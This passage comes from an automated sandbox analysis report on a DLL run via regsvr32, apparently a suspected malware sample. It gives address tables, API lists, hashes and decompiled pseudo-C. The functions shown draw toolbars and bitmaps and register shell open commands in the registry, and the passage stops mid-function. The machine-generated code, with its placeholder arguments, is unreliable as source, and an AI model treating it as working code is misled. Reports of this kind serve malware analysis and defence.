                                                                              0x1002106d
                                                                              0x10021075
                                                                              0x10021075
                                                                              0x10021080
                                                                              0x10021090
                                                                              0x1002109d
                                                                              0x100210ad
                                                                              0x100210b8
                                                                              0x100210be
                                                                              0x100210c5
                                                                              0x100210c7
                                                                              0x100210cf
                                                                              0x100210cf
                                                                              0x100210d3
                                                                              0x100210d3
                                                                              0x10020a7c
                                                                              0x10020a65
                                                                              0x10020a57
                                                                              0x10020a1e
                                                                              0x1002086d
                                                                              0x1002088c
                                                                              0x1002088e
                                                                              0x1002088e
                                                                              0x10020894
                                                                              0x1002089d
                                                                              0x100208a5
                                                                              0x100208a5
                                                                              0x100208a9
                                                                              0x100208a9
                                                                              0x10020861
                                                                              0x10020830
                                                                              0x100207f7
                                                                              0x100211b8

                                                                              APIs
                                                                              • lstrlenW.KERNEL32 ref: 100207A1
                                                                              • GetClassNameW.USER32 ref: 100207D5
                                                                                • Part of subcall function 1002AD18: SystemParametersInfoW.USER32 ref: 1002AD7F
                                                                                • Part of subcall function 1002AD18: CreateFontIndirectW.GDI32 ref: 1002AD8D
                                                                              • SendMessageW.USER32 ref: 1002098D
                                                                              • SendMessageW.USER32 ref: 100209B0
                                                                              • lstrlenW.KERNEL32 ref: 100209BD
                                                                              • GetClassNameW.USER32 ref: 100209FC
                                                                              • SendMessageW.USER32 ref: 10020ACE
                                                                              • SendMessageW.USER32 ref: 10020AFD
                                                                              • IntersectRect.USER32 ref: 10020B1B
                                                                              • SendMessageW.USER32 ref: 10020B5A
                                                                              • CreatePopupMenu.USER32 ref: 10020B9E
                                                                              • CreateCompatibleDC.GDI32 ref: 10020BBC
                                                                              • CopyRect.USER32 ref: 10020CE0
                                                                              • OffsetRect.USER32 ref: 10020D1D
                                                                              • CreateCompatibleBitmap.GDI32 ref: 10020D5D
                                                                              • GetSysColor.USER32 ref: 10020DC1
                                                                              • InsertMenuItemW.USER32 ref: 10020F1C
                                                                              • CopyRect.USER32 ref: 10020F6B
                                                                                • Part of subcall function 1000C7F4: ClientToScreen.USER32 ref: 1000C806
                                                                                • Part of subcall function 1000C7F4: ClientToScreen.USER32 ref: 1000C814
                                                                                • Part of subcall function 1000FC24: TrackPopupMenu.USER32 ref: 1000FC9F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CreateRect$Menu$ClassClientCompatibleCopyNamePopupScreenlstrlen$BitmapColorFontIndirectInfoInsertIntersectItemOffsetParametersSystemTrack
                                                                              • String ID: P$ReBarWindow32$ToolbarWindow32$p
                                                                              • API String ID: 1199085716-275779206
                                                                              • Opcode ID: ebd25d10db9a3bafec395cabcbe0e29edc855e8cd8d8baca7e0a0a987f2ebc1a
                                                                              • Instruction ID: ac0bf4f6f8ccbddefac2931ca54d7894c1e2aafd30d882bf12f2560085886eae
                                                                              • Opcode Fuzzy Hash: ebd25d10db9a3bafec395cabcbe0e29edc855e8cd8d8baca7e0a0a987f2ebc1a
                                                                              • Instruction Fuzzy Hash: 81425C36205B8582EB20CF25E8503DEB761F7C9B94F818126EB9D47B69DF78D885CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1000D5F8 Relevance: 38.8, APIs: 21, Strings: 1, Instructions: 291windowCOMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 34%
                                                                              			E1000D5F8(void* __ebx, void* __rcx, void* __rdx, void* __r8) {
				void* _t134;
				void* _t159;
				void* _t173;
				void* _t174;
				signed int _t216;
				void* _t301;
				long long _t302;
				long long _t303;
				void* _t304;
				void* _t305;
				void* _t310;

				_t184 = __ebx;
				_t310 = _t304;
				_t305 = _t304 - 0x118;
				 *((long long*)(_t305 + 0x100)) = 0xfffffffe;
				r14d = r9d;
				r15d = r8d;
				_t301 = __rdx;
				 *((long long*)(_t310 - 0x98)) = 0x10055878;
				 *((long long*)(_t310 - 0x90)) = _t302;
				 *((long long*)(_t310 - 0x88)) = _t302;
				 *((intOrPtr*)(_t310 - 0x80)) = 0;
				 *((long long*)(_t310 - 0x48)) = 0x10055878;
				 *((long long*)(_t310 - 0x40)) = _t302;
				 *((long long*)(_t310 - 0x38)) = _t302;
				 *((intOrPtr*)(_t310 - 0x30)) = 0;
				 *((long long*)(_t310 - 0x78)) = 0x10055878;
				 *((long long*)(_t310 - 0x70)) = _t302;
				 *((long long*)(_t310 - 0x68)) = _t302;
				 *((intOrPtr*)(_t310 - 0x60)) = 0;
				 *((long long*)(_t305 + 0x58)) = _t302;
				 *((long long*)(_t305 + 0x50)) = 0x10055dd0;
				 *((long long*)(_t310 - 0x50)) = _t302;
				_t229 = 0x10055db0;
				 *((long long*)(_t310 - 0x58)) = 0x10055db0;
				CreateCompatibleDC(??);
				if(E1000CA04(__ebx, 0x10055db0, _t305 + 0x80, 0x10055db0, __r8, _t310) == 0) {
					L14:
					 *((long long*)(_t305 + 0xc0)) = 0x10055188;
					E1000CECC(_t229, _t305 + 0xc0);
					 *((long long*)(_t305 + 0x50)) = 0x10055188;
					E1000CECC(_t229, _t305 + 0x50);
					E1000CA9C(_t305 + 0xa0);
					E1000CA9C(_t305 + 0xd0);
					_t134 = E1000CA9C(_t305 + 0x80);
				} else {
					CreateCompatibleDC();
					if(E1000CA04(__ebx, 0x10055db0, _t305 + 0xd0, 0x10055db0, __r8, _t310) == 0) {
						goto L14;
					} else {
						CreateCompatibleDC();
						if(E1000CA04(__ebx, 0x10055db0, _t305 + 0xa0, 0x10055db0, __r8, _t310) == 0 || GetObjectW() == 0) {
							goto L14;
						} else {
							E1000CECC(0x10055db0, _t301);
							r9d =  *(_t305 + 0x72) & 0x0000ffff;
							r8d =  *(_t305 + 0x70) & 0x0000ffff;
							 *((long long*)(_t305 + 0x20)) = _t302;
							CreateBitmap(??, ??, ??, ??, ??);
							if(E1000CE50(__ebx, 0x10055db0, _t301, 0x10055db0, _t310) == 0) {
								goto L14;
							} else {
								 *((long long*)(_t305 + 0x20)) = 0x10055e60;
								_t30 = _t302 + 1; // 0x1
								_t216 = _t30;
								r9d = _t216;
								r8d = _t216;
								CreateBitmap(??, ??, ??, ??, ??);
								E1000CE50(__ebx, 0x10055e60, _t305 + 0x50, 0x10055e60, _t310);
								CreatePatternBrush(??);
								E1000CE50(_t184, 0x10055e60, _t305 + 0xc0, 0x10055e60, _t310);
								E1000CECC(0x10055e60, _t305 + 0x50);
								 *((long long*)(_t305 + 0x20)) = _t302;
								r9d = _t216;
								r8d = _t216;
								CreateBitmap(??, ??, ??, ??, ??);
								E1000CE50(_t184, 0x10055e60, _t305 + 0x50, 0x10055e60, _t310);
								SelectObject(??, ??);
								E1000CE2C(0x10055e60, 0x10055e60);
								SelectObject(??, ??);
								E1000CE2C(0x10055e60, 0x10055e60);
								if(0x10055e60 == _t302 || 0x10055e60 == _t302) {
									 *((long long*)(_t305 + 0xc0)) = 0x10055188;
									E1000CECC(0x10055e60, _t305 + 0xc0);
									 *((long long*)(_t305 + 0x50)) = 0x10055188;
									E1000CECC(0x10055e60, _t305 + 0x50);
									E1000CA9C(_t305 + 0xa0);
									E1000CA9C(_t305 + 0xd0);
									_t134 = E1000CA9C(_t305 + 0x80);
								} else {
									r8d = 0;
									_t159 = E1000C0A4(GetPixel(??, ??, ??), _t305 + 0x80);
									 *((intOrPtr*)(_t305 + 0x40)) = 0xcc0020;
									 *((intOrPtr*)(_t305 + 0x38)) = 0;
									 *((intOrPtr*)(_t305 + 0x30)) = 0;
									 *((long long*)(_t305 + 0x28)) =  *((intOrPtr*)(_t305 + 0x88));
									 *((intOrPtr*)(_t305 + 0x20)) =  *((intOrPtr*)(_t305 + 0x68));
									r9d =  *(_t305 + 0x64);
									r8d = 0;
									BitBlt(??, ??, ??, ??, ??, ??, ??, ??, ??);
									E1000C0A4(0xffffff, _t305 + 0x80);
									 *((intOrPtr*)(_t305 + 0x40)) = 0xee0086;
									 *((intOrPtr*)(_t305 + 0x38)) = 0;
									 *((intOrPtr*)(_t305 + 0x30)) = 0;
									_t229 =  *((intOrPtr*)(_t305 + 0x88));
									 *((long long*)(_t305 + 0x28)) = _t229;
									 *((intOrPtr*)(_t305 + 0x20)) =  *((intOrPtr*)(_t305 + 0x68));
									r9d =  *(_t305 + 0x64);
									r8d = 0;
									BitBlt(??, ??, ??, ??, ??, ??, ??, ??, ??);
									E1000C0A4(_t159, _t305 + 0x80);
									if(_t301 != _t302) {
									}
									SelectObject();
									E1000CE2C(_t229, _t229);
									_t303 = _t229;
									if(_t229 != _t302) {
										_t173 = E1000C118(r15d, _t305 + 0xa0);
										_t174 = E1000C0A4(r14d, _t305 + 0xa0);
										 *((intOrPtr*)(_t305 + 0xf0)) = 0;
										 *((intOrPtr*)(_t305 + 0xf4)) = 0;
										 *(_t305 + 0xf8) =  *(_t305 + 0x64);
										 *((intOrPtr*)(_t305 + 0xfc)) =  *((intOrPtr*)(_t305 + 0x68));
										FillRect(??, ??, ??);
										E1000C118(_t173, _t305 + 0xa0);
										E1000C0A4(_t174, _t305 + 0xa0);
										 *((intOrPtr*)(_t305 + 0x40)) = 0x660046;
										 *((intOrPtr*)(_t305 + 0x38)) = 0;
										 *((intOrPtr*)(_t305 + 0x30)) = 0;
										 *((long long*)(_t305 + 0x28)) =  *((intOrPtr*)(_t305 + 0x88));
										 *((intOrPtr*)(_t305 + 0x20)) =  *((intOrPtr*)(_t305 + 0x68));
										r9d =  *(_t305 + 0x64);
										r8d = 0;
										BitBlt(??, ??, ??, ??, ??, ??, ??, ??, ??);
										 *((intOrPtr*)(_t305 + 0x40)) = 0x8800c6;
										 *((intOrPtr*)(_t305 + 0x38)) = 0;
										 *((intOrPtr*)(_t305 + 0x30)) = 0;
										 *((long long*)(_t305 + 0x28)) =  *((intOrPtr*)(_t305 + 0xd8));
										 *((intOrPtr*)(_t305 + 0x20)) =  *((intOrPtr*)(_t305 + 0x68));
										r9d =  *(_t305 + 0x64);
										r8d = 0;
										BitBlt(??, ??, ??, ??, ??, ??, ??, ??, ??);
										 *((intOrPtr*)(_t305 + 0x40)) = 0x660046;
										 *((intOrPtr*)(_t305 + 0x38)) = 0;
										 *((intOrPtr*)(_t305 + 0x30)) = 0;
										_t229 =  *((intOrPtr*)(_t305 + 0x88));
										 *((long long*)(_t305 + 0x28)) =  *((intOrPtr*)(_t305 + 0x88));
										 *((intOrPtr*)(_t305 + 0x20)) =  *((intOrPtr*)(_t305 + 0x68));
										r9d =  *(_t305 + 0x64);
										r8d = 0;
										BitBlt(??, ??, ??, ??, ??, ??, ??, ??, ??);
										_t302 =  *((intOrPtr*)(_t303 + 8));
									}
									SelectObject();
									E1000CE2C(_t229, _t229);
									SelectObject(??, ??);
									E1000CE2C(_t229, _t229);
									SelectObject(??, ??);
									E1000CE2C(_t229, _t229);
									goto L14;
								}
							}
						}
					}
				}
				return _t134;
			}














                                                                              0x1000d5f8
                                                                              0x1000d605
                                                                              0x1000d608
                                                                              0x1000d60f
                                                                              0x1000d61b
                                                                              0x1000d61e
                                                                              0x1000d621
                                                                              0x1000d62e
                                                                              0x1000d637
                                                                              0x1000d63e
                                                                              0x1000d645
                                                                              0x1000d649
                                                                              0x1000d64d
                                                                              0x1000d651
                                                                              0x1000d655
                                                                              0x1000d659
                                                                              0x1000d65d
                                                                              0x1000d661
                                                                              0x1000d665
                                                                              0x1000d669
                                                                              0x1000d675
                                                                              0x1000d67a
                                                                              0x1000d67e
                                                                              0x1000d685
                                                                              0x1000d68b
                                                                              0x1000d6a3
                                                                              0x1000dad5
                                                                              0x1000dadc
                                                                              0x1000daec
                                                                              0x1000daf2
                                                                              0x1000dafc
                                                                              0x1000db0a
                                                                              0x1000db18
                                                                              0x1000db26
                                                                              0x1000d6a9
                                                                              0x1000d6ab
                                                                              0x1000d6c3
                                                                              0x00000000
                                                                              0x1000d6c9
                                                                              0x1000d6cb
                                                                              0x1000d6e3
                                                                              0x00000000
                                                                              0x1000d703
                                                                              0x1000d706
                                                                              0x1000d70b
                                                                              0x1000d711
                                                                              0x1000d717
                                                                              0x1000d724
                                                                              0x1000d737
                                                                              0x00000000
                                                                              0x1000d73d
                                                                              0x1000d744
                                                                              0x1000d749
                                                                              0x1000d749
                                                                              0x1000d74c
                                                                              0x1000d74f
                                                                              0x1000d757
                                                                              0x1000d765
                                                                              0x1000d76f
                                                                              0x1000d780
                                                                              0x1000d78a
                                                                              0x1000d78f
                                                                              0x1000d794
                                                                              0x1000d797
                                                                              0x1000d7a2
                                                                              0x1000d7b0
                                                                              0x1000d7c1
                                                                              0x1000d7ca
                                                                              0x1000d7df
                                                                              0x1000d7e8
                                                                              0x1000d7f3
                                                                              0x1000da84
                                                                              0x1000da94
                                                                              0x1000da9a
                                                                              0x1000daa4
                                                                              0x1000dab2
                                                                              0x1000dac0
                                                                              0x1000dace
                                                                              0x1000d802
                                                                              0x1000d802
                                                                              0x1000d81f
                                                                              0x1000d826
                                                                              0x1000d82e
                                                                              0x1000d832
                                                                              0x1000d83e
                                                                              0x1000d847
                                                                              0x1000d84b
                                                                              0x1000d850
                                                                              0x1000d85d
                                                                              0x1000d870
                                                                              0x1000d875
                                                                              0x1000d87d
                                                                              0x1000d881
                                                                              0x1000d885
                                                                              0x1000d88d
                                                                              0x1000d896
                                                                              0x1000d89a
                                                                              0x1000d89f
                                                                              0x1000d8ac
                                                                              0x1000d8bc
                                                                              0x1000d8c4
                                                                              0x1000d8c4
                                                                              0x1000d8d7
                                                                              0x1000d8e0
                                                                              0x1000d8e5
                                                                              0x1000d8eb
                                                                              0x1000d8fc
                                                                              0x1000d90e
                                                                              0x1000d915
                                                                              0x1000d91c
                                                                              0x1000d927
                                                                              0x1000d932
                                                                              0x1000d951
                                                                              0x1000d961
                                                                              0x1000d970
                                                                              0x1000d97a
                                                                              0x1000d97e
                                                                              0x1000d982
                                                                              0x1000d98e
                                                                              0x1000d997
                                                                              0x1000d99b
                                                                              0x1000d9a0
                                                                              0x1000d9ad
                                                                              0x1000d9b3
                                                                              0x1000d9bb
                                                                              0x1000d9bf
                                                                              0x1000d9cb
                                                                              0x1000d9d4
                                                                              0x1000d9d8
                                                                              0x1000d9dd
                                                                              0x1000d9ea
                                                                              0x1000d9f0
                                                                              0x1000d9f4
                                                                              0x1000d9f8
                                                                              0x1000d9fc
                                                                              0x1000da04
                                                                              0x1000da0d
                                                                              0x1000da11
                                                                              0x1000da16
                                                                              0x1000da23
                                                                              0x1000da29
                                                                              0x1000da29
                                                                              0x1000da38
                                                                              0x1000da41
                                                                              0x1000da53
                                                                              0x1000da5c
                                                                              0x1000da6d
                                                                              0x1000da76
                                                                              0x00000000
                                                                              0x1000da76
                                                                              0x1000d7f3
                                                                              0x1000d737
                                                                              0x1000d6e3
                                                                              0x1000d6c3
                                                                              0x1000db3e

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Object$Create$Select$BitmapCompatible$Color$BrushDeleteFillPatternPixelRect
                                                                              • String ID:
                                                                              • API String ID: 2709215489-3916222277
                                                                              • Opcode ID: 388ba5c72ad07cf1d5e5dc96b181b4aaed6378b4a4d1a4b0e601d56227d681c2
                                                                              • Instruction ID: ff1158ece71fe56f9626f2469132e60bf1df608adbebcb78991000b604ec8fd6
                                                                              • Opcode Fuzzy Hash: 388ba5c72ad07cf1d5e5dc96b181b4aaed6378b4a4d1a4b0e601d56227d681c2
                                                                              • Instruction Fuzzy Hash: 4AD13936319B9486E760DB15F88079EB7A1F7C9B94F514126EACD83B18DF78D885CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10034954 Relevance: 34.5, APIs: 3, Strings: 16, Instructions: 1213windowregistryCOMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 66%
                                                                              			E10034954(long __ebx, intOrPtr __edx, intOrPtr* __rax, intOrPtr __rcx, void* __rdx, char* __r8, char* __r9, void* __r11, char _a24, void* _a32) {
				long long _v64;
				long long _v72;
				char _v80;
				char _v88;
				char _v96;
				char _v104;
				char _v112;
				char _v120;
				void* _v128;
				void* _v136;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* __r12;
				void* __r13;
				void* _t267;
				void* _t269;
				void* _t277;
				void* _t287;
				void* _t290;
				signed int _t330;
				void* _t503;
				long _t565;
				intOrPtr _t586;
				intOrPtr* _t589;
				long long _t594;
				intOrPtr* _t616;
				intOrPtr _t617;
				intOrPtr* _t618;
				intOrPtr _t619;
				void* _t620;
				long long _t623;
				long long _t624;
				long long _t625;
				long long _t626;
				intOrPtr _t628;
				intOrPtr* _t632;
				intOrPtr* _t764;
				intOrPtr* _t766;
				intOrPtr* _t770;
				intOrPtr* _t772;
				intOrPtr* _t774;
				intOrPtr* _t776;
				intOrPtr* _t778;
				intOrPtr* _t780;
				intOrPtr* _t800;
				intOrPtr* _t802;
				intOrPtr* _t804;
				intOrPtr* _t806;
				intOrPtr* _t808;
				intOrPtr* _t810;
				intOrPtr* _t817;
				intOrPtr* _t819;
				intOrPtr* _t821;
				intOrPtr* _t823;
				intOrPtr* _t825;
				intOrPtr* _t827;
				intOrPtr* _t830;
				intOrPtr* _t832;
				intOrPtr* _t834;
				intOrPtr* _t836;
				intOrPtr* _t838;
				intOrPtr* _t840;
				intOrPtr* _t843;
				intOrPtr* _t845;
				intOrPtr* _t847;
				intOrPtr* _t849;
				intOrPtr* _t851;
				intOrPtr* _t853;
				intOrPtr* _t863;
				intOrPtr* _t865;
				intOrPtr* _t867;
				intOrPtr* _t869;
				intOrPtr* _t871;
				intOrPtr* _t873;
				intOrPtr* _t876;
				intOrPtr* _t878;
				intOrPtr* _t880;
				intOrPtr* _t882;
				intOrPtr* _t884;
				intOrPtr* _t886;
				intOrPtr* _t889;
				intOrPtr* _t891;
				intOrPtr* _t893;
				intOrPtr* _t895;
				intOrPtr* _t897;
				intOrPtr* _t899;
				intOrPtr* _t907;
				intOrPtr* _t909;
				intOrPtr* _t911;
				intOrPtr* _t913;
				intOrPtr* _t915;
				intOrPtr* _t917;
				intOrPtr* _t920;
				intOrPtr* _t922;
				intOrPtr* _t924;
				intOrPtr* _t926;
				intOrPtr* _t928;
				intOrPtr* _t930;
				void* _t933;
				intOrPtr* _t934;
				intOrPtr* _t935;
				void* _t936;
				void* _t937;
				intOrPtr* _t938;
				intOrPtr* _t944;
				void* _t945;
				void* _t946;

				_t942 = __r9;
				_t940 = __r8;
				_t761 = __rdx;
				_t616 = __rax;
				_t585 = __edx;
				_t565 = __ebx;
				_v64 = 0xfffffffe;
				_t586 = __edx;
				_t628 = __rcx;
				E10029130(_t267);
				_t632 = _t616;
				r8d = 0;
				r8b = _t616 != 0;
				if(r8d == 0) {
					E10009538(0x80004005, __edx, _t616, __rcx, _t632, __rdx, _t933, __r8, __r9, __r11);
					asm("int3");
				}
				_t617 =  *_t616;
				_t269 =  *((intOrPtr*)(_t617 + 0x18))();
				_t618 = _t617 + 0x18;
				_v80 = _t618;
				E10029130(_t269);
				_t944 = _t618;
				_t589 = _t618;
				_t567 = 0 | _t589 == 0x00000000;
				if(_t589 == 0) {
					_t567 = 0x80004005;
					E10009538(0x80004005, _t585, _t618, _t628, _t632, _t761, _t933, _t940, _t942, _t944);
					asm("int3");
				}
				_t619 =  *_t618;
				 *((intOrPtr*)(_t619 + 0x18))();
				_t620 = _t619 + 0x18;
				_a32 = _t620;
				E1000A57C(_t565, _t567, _t585, _t586, _t620, _t940, _t942, _t944);
				_t762 =  &_v80;
				E1003065C(_t565, _t586,  &_v80, _t933, _t936, _t937, _t940, _t942, _t945);
				_t938 =  *((intOrPtr*)(_t628 + 0x10));
				r12d = 1;
				r13d = _t945 - 2;
				if(_t938 == 0) {
					L201:
					_t764 = _a32 + 0xffffffe8;
					asm("lock xadd [edx+0x10], eax");
					if(r13d + r13d <= 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t764)) + 8))();
					}
					_t766 = _v80 + 0xffffffe8;
					asm("lock xadd [edx+0x10], eax");
					_t277 = r13d + r13d;
					if(_t277 > 0) {
						return _t277;
					} else {
						return  *((intOrPtr*)( *((intOrPtr*)( *_t766)) + 8))();
					}
				} else {
					goto L5;
				}
				while(1) {
					L5:
					_t934 = _t938;
					if(_t938 == 0) {
						break;
					}
					_t938 =  *_t938;
					_t935 =  *((intOrPtr*)(_t934 + 0x10));
					E100095D8(_v80 + 0xffffffe8);
					_t623 = _t620 + 0x18;
					_v120 = _t623;
					E100095D8(_v80 + 0xffffffe8);
					_t624 = _t623 + 0x18;
					_v96 = _t624;
					E100095D8(_v80 + 0xffffffe8);
					_t625 = _t624 + 0x18;
					_v112 = _t625;
					_t644 = _v80 + 0xffffffe8;
					_t284 = E100095D8(_v80 + 0xffffffe8);
					_t626 = _t625 + 0x18;
					_v88 = _t626;
					if(_t586 == 0) {
						L13:
						E10029130(_t284);
						if((0 | _t626 != 0x00000000) == 0) {
							L199:
							E10009538(0x80004005, _t585, _t626, _t628, _t644, _t762, _t935, _t940, _t942, _t944);
							break;
						}
						_t762 =  *_t626;
						_t644 = _t626;
						_t287 =  *((intOrPtr*)( *_t626 + 0x18))();
						_t626 = _t626 + 0x18;
						_v128 = _t626;
						E10029130(_t287);
						if((0 | _t626 != 0x00000000) == 0) {
							L198:
							E10009538(0x80004005, _t585, _t626, _t628, _t644, _t762, _t935, _t940, _t942, _t944);
							goto L199;
						}
						_t762 =  *_t626;
						_t644 = _t626;
						_t290 =  *((intOrPtr*)( *_t626 + 0x18))();
						_t626 = _t626 + 0x18;
						_v136 = _t626;
						E10029130(_t290);
						if((0 | _t626 != 0x00000000) == 0) {
							L197:
							E10009538(0x80004005, _t585, _t626, _t628, _t644, _t762, _t935, _t940, _t942, _t944);
							goto L198;
						}
						 *((intOrPtr*)( *_t626 + 0x18))();
						_v104 = _t626 + 0x18;
						_t620 =  *_t935;
						r8d = 5;
						if( *((intOrPtr*)(_t620 + 0xc8))() == 0) {
							L178:
							_t770 = _v104 + 0xffffffe8;
							asm("lock xadd [edx+0x10], eax");
							if(r13d + r13d <= 0) {
								_t620 =  *((intOrPtr*)( *_t770));
								 *((intOrPtr*)(_t620 + 8))();
							}
							_t772 = _v136 + 0xffffffe8;
							asm("lock xadd [edx+0x10], eax");
							if(r13d + r13d <= 0) {
								_t620 =  *((intOrPtr*)( *_t772));
								 *((intOrPtr*)(_t620 + 8))();
							}
							_t774 = _v128 + 0xffffffe8;
							asm("lock xadd [edx+0x10], eax");
							if(r13d + r13d <= 0) {
								_t620 =  *((intOrPtr*)( *_t774));
								 *((intOrPtr*)(_t620 + 8))();
							}
							_t776 = _v88 + 0xffffffe8;
							asm("lock xadd [edx+0x10], eax");
							if(r13d + r13d <= 0) {
								_t620 =  *((intOrPtr*)( *_t776));
								 *((intOrPtr*)(_t620 + 8))();
							}
							_t778 = _v112 + 0xffffffe8;
							asm("lock xadd [edx+0x10], eax");
							if(r13d + r13d <= 0) {
								_t620 =  *((intOrPtr*)( *_t778));
								 *((intOrPtr*)(_t620 + 8))();
							}
							_t780 = _v96 + 0xffffffe8;
							asm("lock xadd [edx+0x10], eax");
							if(r13d + r13d <= 0) {
								_t620 =  *((intOrPtr*)( *_t780));
								 *((intOrPtr*)(_t620 + 8))();
							}
							_t762 = _v120 + 0xffffffe8;
							asm("lock xadd [edx+0x10], eax");
							if(r13d + r13d <= 0) {
								_t620 =  *((intOrPtr*)( *_t762));
								 *((intOrPtr*)(_t620 + 8))();
							}
							L192:
							r12d = r12d + 1;
							if(_t938 == 0) {
								goto L201;
							}
							continue;
						}
						_t620 = _v136;
						if( *((intOrPtr*)(_t620 - 0x10)) == 0) {
							goto L178;
						} else {
							_t620 =  *_t935;
							r8d = 6;
							if( *((intOrPtr*)(_t620 + 0xc8))() == 0) {
								_t52 =  &_v136; // 0x21
								_t53 =  &_v104; // 0x41
								E1001A4B4(_t565, _t586, _t53, _t52, _t940, _t945);
							}
							r8d = 0;
							if(E10033CC4(_t620, _v136, _v104, _t940) != 0) {
								if(_t586 == 0) {
									L51:
									_t620 =  *_t935;
									r8d = 0;
									if( *((intOrPtr*)(_t620 + 0xc8))() == 0) {
										L55:
										_t942 = L"ddeexec";
										_t940 = _v136;
										E10013AF0(L"%s\\shell\\open\\%s", _v136, L"ddeexec");
										r8d = 0;
										if(E10033CC4(_t620, _a32, L"[open(\"%1\")]", _v136) != 0) {
											if(_t586 == 0) {
												r8d = E10039820(_t320, L" \"%1\"");
												_t149 =  &_v120; // 0x31
												E1000B5C0(_t149, L" \"%1\"", _t935, _t936, _t940, _t944, _t945, _t946);
												L103:
												_t942 = L"command";
												_t940 = _v136;
												E10013AF0(L"%s\\shell\\open\\%s", _v136, L"command");
												r8d = 0;
												if(E10033CC4(_t620, _a32, _v120, _v136) != 0) {
													if(_t586 == 0) {
														L149:
														_t620 =  *_t935;
														r8d = 4;
														 *((intOrPtr*)(_t620 + 0xc8))();
														_t762 = _v128;
														if( *((intOrPtr*)(_v128 - 0x10)) == 0) {
															goto L178;
														}
														_a24 = 0x208;
														_t940 = _a32;
														if(( *((intOrPtr*)(_a32 - 0xc)) - 0x00000208 | 0x00000001 -  *((intOrPtr*)(_a32 - 8))) < 0) {
															_t585 = 0x208;
															_t212 =  &_a32; // 0xc9
															E10009920(0x208, _t212, _t935, _t940);
															_t940 = _a32;
															_t762 = _v128;
														}
														_t942 =  &_a24;
														_t565 = RegQueryValueW(??, ??, ??, ??);
														_t644 = _a32;
														if(_t644 != 0) {
															_t330 = E10039820(_t329, _t644);
															if(_t330 < 0) {
																goto L196;
															}
															_t644 = _a32;
															goto L156;
														} else {
															_t330 = 0;
															L156:
															if(_t330 >  *((intOrPtr*)(_t644 - 0xc))) {
																L196:
																E10009538(0x80070057, _t585, _t620, _t628, _t644, _t762, _t935, _t940, _t942, _t944);
																goto L197;
															}
															 *(_t644 - 0x10) = _t330;
															_t620 = _a32;
															 *((short*)(_t620 + _t330 * 2)) = 0;
															if(_t565 != 0) {
																L161:
																r8d = 0;
																if(E10033CC4(_t620, _v128, _v136, _t940) != 0) {
																	if(_t586 != 0) {
																		E10013AF0(L"%s\\ShellNew", _v128, _t942);
																		_t940 = L"NullFile";
																		E10033CC4(_t620, _a32, 0x100577b8, L"NullFile");
																	}
																	goto L178;
																}
																_t800 = _v104 + 0xffffffe8;
																asm("lock xadd [edx+0x10], eax");
																if(r13d + r13d <= 0) {
																	_t620 =  *((intOrPtr*)( *_t800));
																	 *((intOrPtr*)(_t620 + 8))();
																}
																_t802 = _v136 + 0xffffffe8;
																asm("lock xadd [edx+0x10], eax");
																if(r13d + r13d <= 0) {
																	_t620 =  *((intOrPtr*)( *_t802));
																	 *((intOrPtr*)(_t620 + 8))();
																}
																_t804 = _v128 + 0xffffffe8;
																asm("lock xadd [edx+0x10], eax");
																if(r13d + r13d <= 0) {
																	_t620 =  *((intOrPtr*)( *_t804));
																	 *((intOrPtr*)(_t620 + 8))();
																}
																_t806 = _v88 + 0xffffffe8;
																asm("lock xadd [edx+0x10], eax");
																if(r13d + r13d <= 0) {
																	_t620 =  *((intOrPtr*)( *_t806));
																	 *((intOrPtr*)(_t620 + 8))();
																}
																_t808 = _v112 + 0xffffffe8;
																asm("lock xadd [edx+0x10], eax");
																if(r13d + r13d <= 0) {
																	_t620 =  *((intOrPtr*)( *_t808));
																	 *((intOrPtr*)(_t620 + 8))();
																}
																_t810 = _v96 + 0xffffffe8;
																asm("lock xadd [edx+0x10], eax");
																if(r13d + r13d <= 0) {
																	_t620 =  *((intOrPtr*)( *_t810));
																	 *((intOrPtr*)(_t620 + 8))();
																}
																_t762 = _v120 + 0xffffffe8;
																asm("lock xadd [edx+0x10], eax");
																if(r13d + r13d <= 0) {
																	_t620 =  *((intOrPtr*)( *_t762));
																	 *((intOrPtr*)(_t620 + 8))();
																}
																goto L192;
															}
															_t644 = _a32;
															if( *((intOrPtr*)(_a32 - 0x10)) == _t565) {
